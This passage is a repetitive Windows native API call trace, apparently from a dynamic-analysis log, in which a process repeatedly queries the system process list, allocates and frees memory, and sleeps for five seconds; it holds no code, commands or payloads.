Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.922] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.929] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.936] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.971] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.978] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.986] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.994] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.002] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.018] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.025] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.032] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.039] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.047] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.053] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 